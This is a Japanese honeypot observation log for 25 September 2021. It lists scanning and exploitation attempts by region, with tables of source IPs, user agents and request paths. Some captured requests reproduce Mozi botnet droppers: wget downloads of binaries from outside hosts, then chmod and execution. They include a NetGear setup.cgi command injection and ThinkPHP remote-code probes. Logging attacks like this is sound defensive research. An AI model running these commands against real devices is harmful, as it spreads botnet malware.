2021/09/25 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/09/25分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為

Location：JP

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

Location：US

FCKEditorの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
aiohttpによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//27[.]37[.]196[.]68:55749/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws

Location：UK

NetGear製品の脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws

Location：SG

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

他

アクセス数推移

JP：総アクセス数：162 (前日比：+104)
US：総アクセス数：309 (前日比：+275)
UK：総アクセス数：92 (前日比：-2)
SG：総アクセス数：68 (前日比：+12)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
7	3.21.40.163	United States
1	18.222.255.248	United States
1	27.215.143.22	China
1	34.86.35.3	United States
18	40.71.64.141	United States
14	44.193.25.244	United States
2	45.95.147.3	Netherlands
1	45.141.87.59	Russia
11	45.146.164.110	Russia
1	50.198.14.142	United States
7	81.180.84.246	Romania
2	93.186.199.61	Germany
7	135.125.244.48	France
1	137.184.109.176	United States
7	139.59.15.134	Singapore
1	139.162.145.250	Netherlands
1	143.198.170.243	United States
7	178.62.110.176	United States
1	185.53.90.24	Belize
1	192.241.214.90	United States
1	192.241.217.91	United States
1	192.241.220.97	United States
1	198.50.226.32	Canada
3	198.98.59.146	United States
1	198.232.118.99	United States
1	206.189.105.211	United States
1	209.17.96.234	United States
3	209.141.48.211	United States
3	209.141.62.185	United States
55	211.20.26.177	Taiwan

UserAgent一覧

件数	UserAgent
12	-
1	Go-http-client/1.1
7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
55	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
29	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36
27	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3	Mozilla/5.0 zgrab/0.x
1	polaris botnet
14	python-requests/2.26.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$	HTTP/1.0
1		\x03
3		\x16\x03\x01
1		\x16\x03\x01\x01\xfa\x01
28	GET	/.env	HTTP/1.1
1	GET	/2018/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/2019/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/.env	HTTP/1.1
1	GET	/api/.env	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
1	GET	/beta/.env	HTTP/1.1
1	GET	/blog/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
1	GET	/cms/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/config/.env	HTTP/1.1
3	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/flu/403.html	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/kyc/.env	HTTP/1.1
1	GET	/laravel/.env	HTTP/1.1
1	GET	/laravel/core/.env	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/media/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/news/wp-includes/wlwmanifest.xml	HTTP/1.1
55	GET	/phpmyadmin/	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/prod/.env	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/shop/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/site/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/sito/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/stream/live.php	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/test/wp-includes/wlwmanifest.xml	HTTP/1.1
3	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/web/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/website/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wordpress/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/wp/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp1/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp2/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/xmlrpc.php?rsd	HTTP/1.1
1	GET	http[:]//azenv[.]net/	HTTP/1.1
3	HEAD	/	HTTP/1.0
1	HEAD	/	HTTP/1.0\n
2	HEAD	/robots.txt	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
3	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/boaform/admin/formPing	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	23.129.64.159	United States
1	27.37.196.68	China
1	34.65.113.188	United States
1	34.86.35.18	United States
2	45.95.147.3	Netherlands
11	45.146.164.110	Russia
1	52.23.158.162	United States
1	59.95.64.108	India
257	119.91.96.98	China
1	120.86.252.37	China
7	125.64.94.144	China
3	135.125.217.54	France
1	143.198.170.243	United States
7	167.71.204.106	United States
1	185.53.90.24	Belize
2	185.156.72.27	Russia
1	192.241.216.50	United States
1	194.49.68.9	United States
1	197.185.106.172	South Africa
2	198.98.59.146	United States
1	209.17.96.34	United States
1	209.17.96.114	United States
1	209.141.43.209	United States
2	209.141.48.211	United States
1	219.139.201.192	China

UserAgent一覧

件数	UserAgent
20	-
1	Go-http-client/1.1
1	Hello, World
1	Hello, world
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
256	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
1	Mozilla/5.0 zgrab/0.x
1	Python/3.7 aiohttp/3.7.4.post0
1	VLC/3.0.8 LibVLC/3.0.8
1	python-requests/2.23.0

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
11		\x16\x03\x01
7	GET	/.env	HTTP/1.1
1	GET	//favicon[.]ico	HTTP/1.1
1	GET	/404.jpg	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?c=4e5e5d7364f443e28fbf0d3ae744a59a	HTTP/1.1
1	GET	/?q=login.destroy.session&r=0.01231231230	HTTP/1.1
1	GET	/API/DW/Dwplugin/SystemLabel/SiteConfig.htm	HTTP/1.1
1	GET	/API/DW/Dwplugin/TemplateManage/login_site.htm	HTTP/1.1
1	GET	/API/DW/Dwplugin/TemplateManage/manage_site.htm	HTTP/1.1
1	GET	/API/DW/Dwplugin/TemplateManage/save_template.htm	HTTP/1.1
1	GET	/API/DW/Dwplugin/ThirdPartyTags/SiteFactory.xml	HTTP/1.1
1	GET	/Admin/Common/HelpLinks.xml	HTTP/1.1
1	GET	/Admin/Images/LoginImages/admin_text.gif	HTTP/1.1
1	GET	/Admin/Images/LoginImages/admin_top.gif	HTTP/1.1
1	GET	/Admin/Login.aspx	HTTP/1.1
1	GET	/CHANGELOG.txt	HTTP/1.1
1	GET	/CuteSoft_Client/CuteEditor/Help/default.htm	HTTP/1.1
1	GET	/CuteSoft_Client/CuteEditor/ImageEditor/listfiles.aspx	HTTP/1.1
1	GET	/CuteSoft_Client/CuteEditor/Images/log.gif	HTTP/1.1
1	GET	/CuteSoft_Client/CuteEditor/Style/IE.css	HTTP/1.1
1	GET	/Editor.js	HTTP/1.1
1	GET	/Error.aspx	HTTP/1.1
1	GET	/FCK/editor/js/fckeditorcode_ie.js	HTTP/1.1
1	GET	/FCK/fckeditor.js	HTTP/1.1
1	GET	/Help	HTTP/1.1
1	GET	/Images/login/biaoti.jpg	HTTP/1.1
1	GET	/Images/login/lefttu.jpg	HTTP/1.1
1	GET	/Images/login/mainlogo.gif	HTTP/1.1
1	GET	/Include/EcsServerApi.js	HTTP/1.1
1	GET	/Install/logo.gif	HTTP/1.1
1	GET	/License.txt	HTTP/1.1
1	GET	/Ntalker/lawfirm.aspx?17	HTTP/1.1
1	GET	/Prompt/images/P_Wrong.gif	HTTP/1.1
1	GET	/Public/Admin/Images/login_main_bg.jpg	HTTP/1.1
1	GET	/README.txt	HTTP/1.1
1	GET	/Scripts/jquery/maticsoft.jquery.min.js	HTTP/1.1
1	GET	/Search.html	HTTP/1.1
1	GET	/Site/Pages/WebResources.ashx/PoweredByKodakImage	HTTP/1.1
1	GET	/Site/SystemThemes/7917A0869761B5458281E407AE0090F5/Images/ISBanner58px.jpg	HTTP/1.1
1	GET	/Template/Default/Skin/user/images/login_back.jpg	HTTP/1.1
1	GET	/User/Login.aspx	HTTP/1.1
1	GET	/UserCenter/css/admin/bgimg/admin_all_bg.png	HTTP/1.1
1	GET	/Wq_StranJF.js	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/addons/theme/stv1/_static/image/favicon.ico	HTTP/1.1
1	GET	/addons/theme/stv1/_static/ts2/layout.css	HTTP/1.1
1	GET	/addons/theme/stv2/_static/ts2/layout.css	HTTP/1.1
1	GET	/admin	HTTP/1.1
1	GET	/admin.php	HTTP/1.1
1	GET	/admin.php?mod=profile&u_key=123456	HTTP/1.1
1	GET	/admin/	HTTP/1.1
1	GET	/admin/SouthidcEditor/ButtonImage/standard/componentmenu.gif	HTTP/1.1
1	GET	/admin/SouthidcEditor/Dialog/dialog.js	HTTP/1.1
1	GET	/admin/SouthidcEditor/ewebeditor.asp?id=57&style=southidc	HTTP/1.1
1	GET	/admin/admin_login.php?act=login	HTTP/1.1
1	GET	/admin/editor/	HTTP/1.1
1	GET	/admin/inc/xml.xslt	HTTP/1.1
1	GET	/admin/index.php	HTTP/1.1
1	GET	/admin/js/IdSUtil.js	HTTP/1.1
1	GET	/admin/login.asp	HTTP/1.1
1	GET	/admin/login.aspx	HTTP/1.1
1	GET	/admin/login.php	HTTP/1.1
1	GET	/admin/start/index.php	HTTP/1.1
1	GET	/admin/template/article_more/config.htm	HTTP/1.1
1	GET	/administrator/manifests/files/joomla.xml	HTTP/1.1
1	GET	/adminsoft/templates/images/login_bg_top.jpg	HTTP/1.1
1	GET	/advfile/ad12.js	HTTP/1.1
1	GET	/api/api_user.xml	HTTP/1.1
1	GET	/app/Tpl/fanwe_1/js/DD_belatedPNG_0.0.8a-min.js	HTTP/1.1
1	GET	/app/home/skins/default/style.css	HTTP/1.1
1	GET	/app/images/login/logo.png	HTTP/1.1
1	GET	/app/images/login/toplogo.gif	HTTP/1.1
1	GET	/app/js/source/wcmlib/WCMConstants.js	HTTP/1.1
1	GET	/app/login.jsp	HTTP/1.1
1	GET	/apps/admin/_static/image/login_box_bg.png	HTTP/1.1
1	GET	/archive/archive.css	HTTP/1.1
1	GET	/archiver	HTTP/1.1
1	GET	/archiver/	HTTP/1.1
1	GET	/asp.net/README.txt	HTTP/1.1
1	GET	/auth/login	HTTP/1.1
1	GET	/back/scripts/jspxcms_choose.js	HTTP/1.1
1	GET	/base/login/login.php	HTTP/1.1
1	GET	/bbs/	HTTP/1.1
1	GET	/bencandy.php	HTTP/1.1
1	GET	/blog/	HTTP/1.1
1	GET	/business/images/index-gg1.jpg	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
1	GET	/cgi/index.cgi	HTTP/1.1
1	GET	/changelog.txt	HTTP/1.1
1	GET	/ckeditor/ckeditor.js	HTTP/1.1
1	GET	/ckeditor/ckfinder/ckfinder.html	HTTP/1.1
1	GET	/ckeditor/ckfinder/install.txt	HTTP/1.1
1	GET	/ckfinder/ckfinder.html	HTTP/1.1
1	GET	/ckfinder/install.txt	HTTP/1.1
1	GET	/clientscript/vbulletin_ajax_htmlloader.js	HTTP/1.1
1	GET	/common/common.js	HTTP/1.1
1	GET	/common/help/images/helplogo.gif	HTTP/1.1
1	GET	/common/help/images/helplogo_zh.gif	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/console/auth/reg_newuser.jsp	HTTP/1.1
1	GET	/console/include/not_login.htm	HTTP/1.1
1	GET	/console/js/CTRSRequestParam.js	HTTP/1.1
1	GET	/console/js/CWCMDialogHead.js	HTTP/1.1
1	GET	/coremail/common/help/images/helplogo.gif	HTTP/1.1
1	GET	/coremail/common/help/images/helplogo_zh.gif	HTTP/1.1
1	GET	/custom/SkinTemplate/skin/public/images/sys-logo-1caitong-180.jpg	HTTP/1.1
1	GET	/customdir/images/english_logo.jpg	HTTP/1.1
1	GET	/data/admin/ver.txt	HTTP/1.1
1	GET	/data/images/wap_logo.gif	HTTP/1.1
1	GET	/datacenter/downloadApp/showDownload.do	HTTP/1.1
1	GET	/default/css/em_css.css	HTTP/1.1
1	GET	/default/images/logo.gif	HTTP/1.1
1	GET	/deptWebsiteAction.do	HTTP/1.1
1	GET	/dialog/dialog.js	HTTP/1.1
1	GET	/digg.php	HTTP/1.1
1	GET	/docs.css	HTTP/1.1
1	GET	/docs/	HTTP/1.1
1	GET	/docs/DOCUMENTATION.txt	HTTP/1.1
1	GET	/doku.php	HTTP/1.1
1	GET	/e/master/login.aspx	HTTP/1.1
1	GET	/eams/static/scripts/grade/course/input.js	HTTP/1.1
1	GET	/editor/fckeditor.js	HTTP/1.1
1	GET	/editor/js/fckeditorcode_ie.js	HTTP/1.1
1	GET	/examples/file-manager.html	HTTP/1.1
1	GET	/examples/index.html	HTTP/1.1
1	GET	/examples/readonly.html	HTTP/1.1
1	GET	/extern.php?action=feed&type=atom	HTTP/1.1
1	GET	/extman/default/images/logo.gif	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/fckeditor.js	HTTP/1.1
1	GET	/fckeditor/editor/dtd/fck_dtd_test.html	HTTP/1.1
1	GET	/fckeditor/editor/js/fckeditorcode_ie.js	HTTP/1.1
1	GET	/fckeditor/fckconfig.js	HTTP/1.1
1	GET	/fckeditor/fckeditor.js	HTTP/1.1
1	GET	/fckeditor/license.txt	HTTP/1.1
1	GET	/feed.asp	HTTP/1.1
1	GET	/flu/403.html	HTTP/1.1
1	GET	/forum.php	HTTP/1.1
1	GET	/forum/	HTTP/1.1
1	GET	/forums/list.page	HTTP/1.1
1	GET	/help/ch_gb/images/help-title.gif	HTTP/1.1
1	GET	/help/en/h_authenticate.html	HTTP/1.1
1	GET	/help/user/index.html	HTTP/1.1
1	GET	/helpnew/faq/faq_simple_zh_CN.jsp	HTTP/1.1
1	GET	/history.txt	HTTP/1.1
1	GET	/ids/admin/login.jsp	HTTP/1.1
1	GET	/ids/admin/userhome/forgetPwd.jsp	HTTP/1.1
1	GET	/images/2_11.gif	HTTP/1.1
1	GET	/images/Default_bg_002.gif	HTTP/1.1
1	GET	/images/branding/logo.gif	HTTP/1.1
1	GET	/images/default/post_bt.gif	HTTP/1.1
1	GET	/images/favicon.ico	HTTP/1.1
1	GET	/images/hwem.css	HTTP/1.1
1	GET	/images/login/eyoumail.gif	HTTP/1.1
1	GET	/images/login/icon-up.gif	HTTP/1.1
1	GET	/images/login/logo.gif	HTTP/1.1
1	GET	/images/login9/login_33.jpg	HTTP/1.1
1	GET	/images/login_Name.jpg	HTTP/1.1
1	GET	/images/logo-white.png	HTTP/1.1
1	GET	/images/logo_88x31.gif	HTTP/1.1
1	GET	/images/logo_product-cml.png	HTTP/1.1
1	GET	/images/zh-CN/logo.ico	HTTP/1.1
1	GET	/imagesschool/style1/flash2.jpg	HTTP/1.1
1	GET	/img/pic/login/top-left.jpg	HTTP/1.1
1	GET	/inc/Templates/rss.xslt	HTTP/1.1
1	GET	/inc/playerKinds.xml	HTTP/1.1
1	GET	/inc/rsd.php	HTTP/1.1
1	GET	/include/dedeajax2.js	HTTP/1.1
1	GET	/include/dialog/config.php	HTTP/1.1
1	GET	/include/install_ocx.aspx	HTTP/1.1
1	GET	/includes/general.js	HTTP/1.1
1	GET	/index.cgi	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?m=admin	HTTP/1.1
1	GET	/index.php?m=admin&c=index&a=login&pc_hash=	HTTP/1.1
1	GET	/index.php?m=search	HTTP/1.1
1	GET	/index.php?m=wap	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/install	HTTP/1.1
1	GET	/issmall/	HTTP/1.1
1	GET	/jcms/index.jsp	HTTP/1.1
1	GET	/jcms/index_jcms.jsp	HTTP/1.1
1	GET	/js/ajax_x.js	HTTP/1.1
1	GET	/js/buttons.js	HTTP/1.1
1	GET	/kindeditor-min.js	HTTP/1.1
1	GET	/kindeditor.js	HTTP/1.1
1	GET	/ks_inc/ajax.js	HTTP/1.1
1	GET	/lang/en.js	HTTP/1.1
1	GET	/licence.txt	HTTP/1.1
1	GET	/license.txt	HTTP/1.1
1	GET	/list.php	HTTP/1.1
1	GET	/login/Jeecms.do	HTTP/1.1
1	GET	/logo/logo_jw.png	HTTP/1.1
1	GET	/m	HTTP/1.1
1	GET	/maintlogin.jsp	HTTP/1.1
1	GET	/master/login.aspx	HTTP/1.1
1	GET	/max-templates/classic/styles/app.css	HTTP/1.1
1	GET	/media/com_hikashop/js/hikashop.js	HTTP/1.1
1	GET	/member/space/company/info.txt	HTTP/1.1
1	GET	/new_gb/help/images/usage/3.3.gif	HTTP/1.1
1	GET	/next/img/logo.gif	HTTP/1.1
1	GET	/nobody/mobile.htm?Login=Captcha	HTTP/1.1
1	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/docs.css	HTTP/1.1
1	GET	/phpmyadmin/favicon.ico	HTTP/1.1
1	GET	/phpmyadmin/phpmyadmin/docs.css	HTTP/1.1
1	GET	/phpmyadmin/phpmyadmin/favicon.ico	HTTP/1.1
1	GET	/phpmyadmin/phpmyadmin/themes/original/img/logo_right.png	HTTP/1.1
1	GET	/phpmyadmin/themes/original/img/logo_right.png	HTTP/1.1
1	GET	/plug/publish	HTTP/1.1
1	GET	/plugin.php?id=milu_seotool:sitemap&tpl=no&myac=milu_seotool_cron&inajax=1	HTTP/1.1
1	GET	/plugins/anchor/anchor.js	HTTP/1.1
1	GET	/plugins/filemanager/filemanager/js	HTTP/1.1
1	GET	/plus/download.php	HTTP/1.1
1	GET	/plus/heightsearch.php	HTTP/1.1
1	GET	/plus/rssmap.html	HTTP/1.1
1	GET	/plus/sitemap.html	HTTP/1.1
1	GET	/pub/guiedit/guiedit.js	HTTP/1.1
1	GET	/pub/skins/pmwiki/pmwiki.css	HTTP/1.1
1	GET	/public/about.html	HTTP/1.1
1	GET	/public/js/ipb.js	HTTP/1.1
1	GET	/readme.html	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/rss.aspx	HTTP/1.1
1	GET	/rss.php	HTTP/1.1
1	GET	/script/login.js	HTTP/1.1
1	GET	/script/valid_formdata.js	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]95[.]64[.]108:45094/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]37[.]196[.]68:55749/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/siteserver/login.aspx	HTTP/1.1
1	GET	/siteserver/upgrade/default.aspx	HTTP/1.1
1	GET	/skin/frontend/default/modern/css/styles.css	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/static/hgicon.png	HTTP/1.1
1	GET	/static/images/logo/webserver_small.gif	HTTP/1.1
1	GET	/stream/live.php	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/style/default/hdwiki.css	HTTP/1.1
1	GET	/stylesheet.css	HTTP/1.1
1	GET	/system/Login.aspx	HTTP/1.1
1	GET	/system/Update.aspx	HTTP/1.1
1	GET	/system/language/zh-cn.xml	HTTP/1.1
1	GET	/system/skins/default/system.login.htm	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/template/1/bluewise/_files/jspxcms.css	HTTP/1.1
1	GET	/template/home.htm	HTTP/1.1
1	GET	/templates/jsn_glass_pro/ext/hikashop/jsn_ext_hikashop.css	HTTP/1.1
1	GET	/test_404_page/	HTTP/1.1
1	GET	/themes/default/default.css	HTTP/1.1
1	GET	/themes/default/graphics/favicon.ico	HTTP/1.1
1	GET	/themes/default/graphics/horde-power1.png	HTTP/1.1
1	GET	/themes/graphics/horde-power1.png	HTTP/1.1
1	GET	/tools/rss.aspx	HTTP/1.1
1	GET	/tpl/login/user/images/login_bg_1.jpg	HTTP/1.1
1	GET	/tpl/user/tpl1/css/skins/blue.css	HTTP/1.1
1	GET	/uc_server/control/admin/db.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/was/help.jsp	HTTP/1.1
1	GET	/was/main.html	HTTP/1.1
1	GET	/was5/web/index.jsp	HTTP/1.1
1	GET	/wcm/	HTTP/1.1
1	GET	/web2/login_template/1.files/Logo1.jpg	HTTP/1.1
1	GET	/webbuilder/script/locale/wb-lang-zh_CN.js	HTTP/1.1
1	GET	/weblog/	HTTP/1.1
1	GET	/whir_system/login.aspx	HTTP/1.1
1	GET	/whir_system/module/security/login.aspx	HTTP/1.1
1	GET	/wp-content	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-cron.php	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/ycportal/js/wbTextBox/showimg.jsp	HTTP/1.1
1	GET	/ymail/images/index_r1_c4.jpg	HTTP/1.1
1	GET	http[:]//azenv[.]net/	HTTP/1.1
3	HEAD	/	HTTP/1.0
2	HEAD	/robots.txt	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
3	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	34.65.113.188	United States
1	34.77.162.24	United States
1	45.201.206.80	Cambodia
1	51.254.49.96	France
1	58.248.193.183	China
1	69.194.182.218	United States
65	132.145.52.245	United States
1	139.162.145.250	Netherlands
1	139.190.238.6	Pakistan
7	143.198.27.86	United States
1	185.53.90.24	Belize
1	192.241.211.107	United States
1	192.241.212.18	United States
1	192.241.216.109	United States
1	195.154.63.222	France
2	198.98.59.146	United States
1	198.232.118.99	United States
2	209.141.48.211	United States
1	222.244.199.32	China
1	223.149.248.185	China

UserAgent一覧

件数	UserAgent
9	-
1	Go-http-client/1.1
1	Hello, world
1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
65	Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
3	Mozilla/5.0 zgrab/0.x
1	Roku/DVP-9.10 (289.10E04111A)

リクエスト内容一覧

件数	Method	Request	Protocol
3		\x16\x03\x01
3	GET	/.env	HTTP/1.1
1	GET	/.git/HEAD	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/info/config	HTTP/1.1
1	GET	/api/spec.json	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
1	GET	/console/css/%252E%252E%252Fconsole.portal	HTTP/1.1
1	GET	/console/css/%252e%252e%252fconsole.portal	HTTP/1.1
1	GET	/console/images/%252E%252E%252Fconsole.portal	HTTP/1.1
1	GET	/console/images/%252e%252e%252fconsole.portal	HTTP/1.1
3	GET	/favicon.ico	HTTP/1.1
1	GET	/flu/403.html	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/nmaplowercheck1632454746	HTTP/1.1
1	GET	/opc/v1/identity	HTTP/1.1
1	GET	/opc/v1/instance	HTTP/1.1
